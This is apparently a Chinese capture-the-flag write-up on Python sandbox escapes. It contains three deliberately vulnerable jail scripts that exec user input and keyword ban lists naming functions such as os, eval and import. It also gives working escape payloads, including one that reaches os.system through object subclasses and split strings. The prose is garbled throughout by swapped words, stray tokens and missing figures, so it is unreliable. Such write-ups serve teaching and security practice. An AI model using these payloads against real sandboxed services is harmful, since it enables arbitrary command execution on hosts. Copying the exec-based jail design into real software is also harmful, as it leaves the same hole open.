def make_secure(): UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'eval', 'input'] for func in UNSAFE: del __builtins__.__dict__[func] from re import findall # Remove dangerous builtins make_secure() print 'Go Ahead, Expoit me >;D' while True: try: print ">>>", # Read user input until the first whitespace character inp = findall('\S+', raw_input())[0] a = None # Set a to the result from executing the user input exec 'a=' + inp print '>>>', a except Exception, e: print 'Exception:', e
下面是脚本运行的效果。
效果至关于python的命令界面,咱们的目标是读取当前目录下的flag文件。
若是题目没有任何的过滤,读取的命令以下,导入os包,而后直接执行命令。
可是直接导入os会报错,以下图
由于 del 命令删除了对应的命令,以下图
看了Ned Batchelder的分享后学到了新知识。咱们能够用file对象read文件
下面是元类和元类型详细信息,元组,子对象
因为file在索引40,咱们能够硬编码。以下图
用file类型读取flag文件。
python
#!/usr/bin/env python from __future__ import print_function print("Welcome to my Python sandbox! Enter commands below!") banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevin sucks", "input", "banned", "cry sum more", "sys" ] targets = __builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x] while 1: print(">>>", end=' ') data = raw_input() for no in banned: if no.lower() in data.lower(): print("No bueno") break else: # this means nobreak exec data
相对于第一题,第二题是没有直接的回显。
咱们能够用catch_warnings类(索引在59),进行命令执行。
web
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
# -*-coding:utf-8-*- #!/usr/bin/python3 import sys, cmd, os del __builtins__.__dict__['__import__'] del __builtins__.__dict__['eval'] intro = """ pwnhub cuit pwn everything Rules: -No import -No ... -No flag """ def execute(command): exec(command, globals()) class Jail(cmd.Cmd): prompt = '>>> ' filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|') def do_EOF(self, line): sys.exit() def emptyline(self): return cmd.Cmd.emptyline(self) def default(self, line): sys.stdout.write('\x00') def postcmd(self, stop, line): if any(f in line for f in self.filtered): print("You are a big hacker !!!") print("Go away") else: try: execute(line) except NameError: print("NameError: name '%s' is not defined" % line) except Exception: print("Error: %s" % line) return cmd.Cmd.postcmd(self, stop, line) if __name__ == "__main__": try: Jail().cmdloop(intro) except KeyboardInterrupt: print("\rSee you next time !")
这题是cuit2017的题目,python3环境。
这里主要过滤了大量的字符,包括1,2题所用的点号。svg
获取system函数地址,函数
执行system(“ls”)
下面是获取flag的姿式
oop
以上都是利用Python做为脚本语言的特性来逃逸
post